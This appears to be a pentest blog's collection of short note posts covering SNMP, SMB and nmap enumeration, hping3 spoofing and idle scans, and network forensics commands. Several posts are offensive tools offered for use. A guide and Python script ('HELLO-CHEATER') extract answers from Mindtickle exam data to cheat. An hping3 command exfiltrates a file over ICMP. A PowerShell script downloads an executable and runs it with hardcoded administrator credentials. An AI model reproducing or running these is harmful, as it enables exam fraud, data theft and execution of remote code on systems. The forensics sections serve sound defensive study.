Categorieën
Pentest

snmp audit walkthrough

Discover SNMP running hosts

  • nmap -sU -p 161 target-ip

Brute force community string

  • onesixtyone -c /root/seclist target-ip

Enumerate snmp info on host

  • snmpenum target-ip public windows.txt

 

Categorieën
Pentest

hping3

hping3 -S -r -p 135 x.x.x.x

  • -S TCP sync
  • -r check for ID +
  • -p target(open) port

hping3 -a zombie-ip -S -p 23 target-ip

  • -a spoof source-ip
  • -p target service

 

Categorieën
Pentest

How to cheat / pass Mindtickle exams with a 100% score

1. Install Firefox

2. Start your mindtickle course in the firefox browser

3. Open Web developer -> Web Console

4. This should open something like this:

Picture1

5. Now select the Debugger tab and browse to the cf-**.mindtickle.com site icon and underlying folder structure 920xxx -> scormcontent -> lib -> index.html

Picture2

6. Select “control +f” or “command +f” to search the index.html for window.courseData

Picture3

7. Make sure to select and copy the complete Base64 Encoded text

8. Paste the Base64 Encoded text in an online decoder site such as https://www.base64decode.org/ and click on Decode to get the clear text result

Picture4

9. Save the decoded text in a file and open it in your preferred editor

10. Now search for a question in your exam lookup the correct answer:

Picture5

11. Finish your exam and end-up with a 100% score 😉

Now lets automate this further by leveraging a Python Script.

1. Follow the previous mentioned 5 steps but now download the index.html file:

pic-1

2. Past the following python code in a file and save it with the .py extension:

import base64
import json
correctID = []
answer_list = []
print(”)
print(“##########—–HELLO-CHEATER—–##########”)
print(”)
print(“Please provide full MidTickle index.html download path in single quotes”)
print(“Example = ” + “‘//Users/YOURUSERNAME/Desktop/index.html'”)
print(”)
path = input(“Path = : “)
print(”)
with open(path) as search:
for line in search:
line = line.rstrip() # remove ‘\n’ at end of line
if’window.courseData’in line:
data=(line).replace(‘window.courseData = ‘, ”).replace(‘”;’, ”)+'”‘
encoded = data
decoded = base64.b64decode(encoded)
json_array = json.loads(decoded)
#print(“lessonCount”)
###################
lessonsCount = len(json_array[‘course’][‘lessons’])
#print(lessonsCount)
#print(“answerCount”)
###################
answercounter = 0
for i in json_array[‘course’][‘lessons’]:
if (i[‘type’] == ‘quiz’):
break
answercounter += 1
#print(answercounter)
#print(“itemCount”)
####################
itemcounter = len(json_array[‘course’][‘lessons’][answercounter][‘items’])
#print(itemcounter)
#print(“Correct ID’s: “)
correctID_count = 0
for item in json_array[‘course’][‘lessons’][answercounter][‘items’]:
correctID_details = {“id”:None, “title”:None}
correctID_details[‘id’] = item[‘correct’]
correctID_details[‘title’] = item[‘title’]
correctID.append(correctID_details)
correctID_count = correctID_count + 1
#print(correctID)
#print(correctID_count)
#print(“FullanswerList”)
#####################
j = itemcounter
c = 0
while (c < j):
for item in json_array[‘course’][‘lessons’][answercounter][‘items’][c][‘answers’]:
answer_details = {“id”:None, “title”:None}
answer_details[‘id’] = item[‘id’]
answer_details[‘title’] = item[‘title’]
answer_list.append(answer_details)
c = c + 1
#print(answer_list)
##################
print(“###########################################”)
print(“###-The-Correct-MindTickle-Answers-Are:-###”)
print(“###########################################”)
print(”)
#############################
for id in correctID:
correct_id = id[‘id’]
for x in answer_list:
if x[‘id’] == correct_id:
print(“Question: ” + id[‘title’] + ” “)
print(“Answer : ” + x[‘title’])
print(“——————————————-“)
print(”)
print(“#############——ENJOY—–##############”)
print(“####-Created-By-MSX-@-Rootsecurity.nl-#####”)
print(“#############–23/03/2020–################”)
print(“###########################################”)
3. Execute the file in python like shown below
pic-2
4. Enter the file location of the stored index.html file as shown below and click enter
pic-3
5. Enjoy the output of questions and answers together
pic-5
Categorieën
Pentest

SMB

Scan for SMB hosts

  • nmap -sS -p 139,445 target-ip/range

Run nbtscan to obtain netbios info

  • nbtscan -v target-ip

* smbmap -H ip -u anonymous
* smbmap -H ip -u anonymous -r –depth 5
* smbmap -d domain -u user -p password -H x.x.x.x
* smbmap -d domain -u user -p password -H x.x.x.x -R sharename (list files in share)

* smbclient -c “recurse;ls” //x.x.x.x/SYSVOL -U domain\\user%password
* smbclient -L //ip
* smbclient \\\\IP\\ADMIN$ -U user
* get filename

* Copy Folders
smbclient ‘\\server\share’
mask “”
recurse ON
prompt OFF
cd ‘path\to\remote\dir’
lcd ‘~/path/to/download/to/’
mget *

Categorieën
Pentest

NIKTO (web)

nikto -h ip -p 80
owasp-zap

Categorieën
nmap Pentest Uncategorized

nmap

* nmap –script-updatedb
* nmap -p 1-65535 -T4 -A -v
* nmap -p 1-65535 -sV -sS -T4 IP
* nmap -sC -sV -oA name ip
* nmap -T4 -A -sV -v3 -d -oA output –script all target

/usr/share/nmap/scripts/

less name.nmap

  • nmap -sS tcp sync
  • nmap -sT full tcp
  • nmap -sU udp
  • nmap -oX output xml format
  • xsltproc portscan.xml -o portscan.html

Zombie Scan

  1. find incremental fragmentation IP ID +1
  2. nmap -O -v -n ip
  3. if IP ID Sequence is incremental host is good

Use Zombie to scan other host

1.nmap -Pn -sI zombieip:openport targetip -p23 -v

 

 

Categorieën
Hacking Network Forensics Wireshark

Data exfiltration over ICMP

hping3 using kali linux

-E filename to send
-1 use ICMP
-u tell you when –file reached EOF and prevent rewind
-i send ICMP every 10 seconds (slow)
-d Destination IP

root@kali:~# hping3 -E dns2tcp.txt -1 -u -i 10 -d 95 192.168.20.106
HPING 192.168.20.106 (eth0 192.168.20.106): icmp mode set, 28 headers + 95 data bytes
[main] memlockall(): Success
Warning: can’t disable memory paging!
len=123 ip=192.168.20.106 ttl=128 id=27778 icmp_seq=0 rtt=3.2 ms
len=123 ip=192.168.20.106 ttl=128 id=27806 icmp_seq=1 rtt=3.1 ms
len=123 ip=192.168.20.106 ttl=128 id=27852 icmp_seq=2 rtt=2.9 ms
EOF reached, wait some second than press ctrl+c
len=123 ip=192.168.20.106 ttl=128 id=27877 icmp_seq=3 rtt=2.6 ms

Data in file send “dns2tcp.txt”

root@kali:~# cat dns2tcp.txt
Kali

cat dns2tcpdrc

listen = 192.168.20.243
port = 53
user = nobody
chroot = /tmp/
domain = ns01.rootsecurity.info
resources = ssh:127.0.0.1:22
dns2tcpd -F -d 3 -f /dns2tcpdrc

 

Monitor on receiving end using Wireshark

icmp-1

icmp display filter

icmp-2
First session contains first part of the original file
icmp-3
Second session the rest of the file etc.
Categorieën
Network Forensics

Network Forensics Tools & Commands

Sort & Uniq

| sort | uniq -c | sort -nr

tshark

tshark -r file -Y  <display filter> -T fields -e <fieldname>

tshark -r /cases/*.pcap -Y ftp -T fields -e ip.src -e ip.dst | sort | uniq -c | sort –nr

  • Identify search strings

tshark -n -r /cases/*.pcap -Y ‘http.host contains “google” and http.request’

  • Determine POST to domain

tshark -n -r /cases/*.pcap -Y ‘http.host contains “dropbox.xom” and http.request.method == “POST”‘

  • Observe content in frame number

tshark -n -x -r /cases/*.pcap -Y ‘frame.number==27757’

  • Identify TCP stream number

tshark -n -x -r /cases/*.pcap -Y ‘frame.number==27757’ -T fields -e tcp.stream

  • Extract base64 data from stream

tshark -n -r /cases/*.pcap -Y ‘tcp.stream==27757’ -T fields -e tcp.segment_data > /cases/extract.txt

  • Analyse web url requests

tshark -n -r /cases/*.pcap -T fields -E separator=/t -e frame.number -e frame.time -e http.referer -e http.cookie -Y ‘http.request.uri contains “dropbox”‘

MD5SUM

md5sum cases.pcapl

TCPdump

sudo tcpdump -n -i eth0 -s 0 “arp”

sudo tcpdump -n -i eth0 -s 0 “arp and not ether dst ff:ff:ff:ff:ff:ff”

sudo tcpdump -n -i eth0 -s 0 -w /cases/scan.pcap

sudo tcpdump -n -i eth0 -s 0 -w /cases/scan.pcap “net 192.168.20.0/27”

Capinfos

  • List pcap filename/md5/start/end – capture times

capinfos -T -H -a -e *.pcap /cases/*

Editcap

editcap -A ‘2015-11-15 00:00:00’ -B ‘2015-11-16 00:00:00:00’ /cases/*.pcap ~/smaller.pcap

Base64

  • Encode to Base64

cat file | base64 > file.txt

  • URL Base64 decode

Obtain base64 code from follow stream in wireshark and save to file

cat base64-from-url.txt | uridecode.py > native-base64.txt

decode base64 data in a new file

base64 -di native-base64.txt > decode-base64.bin

  • check intended file type

file decode-base64.bin

unzip -t decode-base64.bin

certutil -decode file.txt test.exe

ARPScan

sudo arp-scan -l

Wireshark filters

arp and not eth.dst == ff:ff:ff:ff:ff:ff

http.request and http.host contains “google”

http.request.method == “post” and http.host contains “dropbox.com”

nfdump

  • Order by amount of bytes, Aggregate on proto type

nfdump -O bytes -o extended -R cases/ ‘ip 8.8.8.8’ -A proto

  • Show only session with SYN flag, order by packets, aggregate scr & dst ip’s

nfdump -O packets -R cases/ -A srcip,dstip ‘proto tcp and src ip 8.8.8.8 and flags S and not flags AFRPU’

  • Example with custom format and filer

nfdump -O packets -A dstip -t ‘2015/07/15-2015/08/15’ -R cases/ -o ‘fmt:%da %pkt %fl %bpp’ ‘proto tcp and src ip 8.8.8.8 and flags S and not flags AFRPU and (dst ip 4.4.4.4 or dst ip 3.3.3.3 or dst ip 2.2.2.2)’

  • Output formats

-o long, extended

-o “fmt:%sa %da”

Tag Description Tag Description
%ts Start Time – first seen %in Input Interface num
%te End Time – last seen %out Output Interface num
%td Duration %pkt Packets
%pr Protocol %byt Bytes
%sa Source Address %fl Flows
%da Destination Address %pkt Packets
%sap Source Address:Port %flg TCP Flags
%dap Destination Address:Port%tos %tos Tos
%sp Source Port %bps bps – bits per second
%dp Destination Port %pps pps – packets per second
%sas Source AS %bpp bps – Bytes per package
%das Destination AS

-B flow direction based on port number >1024 client <1024 server

nfdump -B -O tstart -o extended -R 2013/ -o ‘fmt:%ts %te %sa %da %d’ ‘proto tcp and src ip 8.8.8.8 and flags S and not flags AFRPU’

Squid

/etc/squid/squid.conf

/var/log/squid/*

/var/spool/squid/*

–enable referrer

SMB protocol Wirieshark filters

SMB sessions active untill:

-The network connection times out

-The users closes the session

-The user de-authenticates

-The connection fails a server-side security check

Protocal Negotiation  “smb.cmd == 0x72”

LANMAN/ NTLM negotiation

Session Establishment   “smb.cmd == 0x73”

The spnego.negResult field indicates if authentication was successfull result = 0x00

Process ID # gives indication if authentication is initiated by a core system <1000 or user level process >1000

All sessions are uniquely identified by the Multiplex ID so client and server can pair reponse packets

When authentication is successful a USER ID is added which is only valid during the same SMB session

Accessing Service “smb.cmd == 0x75”

Request access to resource

Server checks, if successfull a Tree ID is added

Network Directory  “smb.cmd == 0x32 && smb.trans2.cmd == 0x0005 && smb.qpi_loi == 1004”

Opening a file “smb.cmd == 0xa2”

If a client is permitted access to a file, the server returns a FID ID. This value should not be used to track file access instead use:

smb.cmd == 0xa2 and !smb.fid and smb.file

Create and Request        “smb.cmd == 0xa2” and !smb.fid and smb.file

Locking file for access     “smb.cmd == 0x24”

Reading from file             “smb.cmd == 0x2e”

Closing a file                       “smb.cmd == 0x04”

Tree Disconnect               “smb.cmd == 0x71”

Uses corresponding Tree ID

Logoff                                   “smb.cmd == 0x74”

Uses corresponding UID & PID

Process ID smb.pid smb.pid == 996 smb.pid == 0x03e4
User ID smb.uid
Tree ID smb.tid
File ID smb.fid
  • Export objects from SMB in Wireshark

Wireshark -> File -> Export Objects -> SMB/SMB2

Collecting log evidence

Firewall files

/etc/sysconfig/iptables

/etc/sysconfig/iptables-config

/etc/rsyslog.conf

/var/log/messages*

IDS files

/etc/sysconfig/snort

/etc/snort/*

/etc/rsyslog.conf

/var/log/snort/*

Squid

/etc/squid/squid.conf

/var/log/squid/*

/var/spool/squid/*

Iptables

-d                            destination ip

-i                             input interface

-o                            output interface

-p                            layer 4 proto

–dport                                 destination port

–syn                      match packets with only SYN flags

-j LOG                   Log matched traffic

-j REJECT              Reject matched traffic

SSL Traffic

  • Profile client encryption ciphers

tshark –n –r /cases/*pcap –Y ‘ssl.handshake.type == 1’ –T fields –e ip.src –e ssl.record.version –e ssl.handshake.ciphersuite > /cases/ssl_ciphersuites_by_ip.txt

cat /cases/ssl_ciphersuites_by_ip.txt | awk ‘{print $3}’ | sort | uniq –c | sort –nr

  • Identify SSL certificate subject

tshark –n –r /cases/*pcap –Y ‘ssl.handshake.certificate’ –T fields –E separator=\ | -E aggregator=\ | -e x509ce.dNSName –e x509sat.teletexString –e x509sat.uTF8String –e x509sat.universalString –e x509sat.IA5String | tr –s \ | ‘\n’ | sort | uniq –c | sort –nr

NGREP

  • Search PCAP for strings

ngrep -I dump6.pcap -w ‘root’ -N -t –q

  • Search PCAP for hex value

ngrep -I dump6.pcap  -xX ‘0xc5d5e5f55666768696a6b6c6d6e6’ -N -t –q

TCPXTRACT

  • Extract files (auto file carving) from pcap

tcpxtract -f dump3.pcap

Categorieën
Hacking PowerShell

PowerShell Download File with Authentication

Download files from a external site using authentication in PowerShell

$Url = “http://192.168.20.247/test.test&#8221;
$Path = “$env:temp\test.txt”
$Username = “”
$Password = “”

$WebClient = New-Object System.Net.WebClient
$WebClient.Credentials = New-Object System.Net.Networkcredential($Username, $Password)
$WebClient.DownloadFile( $url, $path )
notepad $Path

Categorieën
Hacking PowerShell

PowerShell Download & run-as script

PowerShell Download & run-as script

PowerShell script


 

#Predefine necessary information
$Username = “DOMAIN\Administrator”
$Password = “PASSWORD”

#Create credential object
$SecurePassWord = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object -TypeName “System.Management.Automation.PSCredential” -ArgumentList $Username, $SecurePassWord

#Download file from website

$Url = “http://192.168.20.247/test.test&#8221;
$Path = “$env:temp\example.exe”

$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile( $url, $path )

(New-Object System.Net.WebClient).DownloadFile($url, $output)
#Start shell
Start-Process $Path -Credential $Cred

 


 

Save as run-as-admin.ps1

If needed compile your .ps1 file to .exe with PS2EXE

https://gallery.technet.microsoft.com/PS2EXE-Convert-PowerShell-9e4e07f1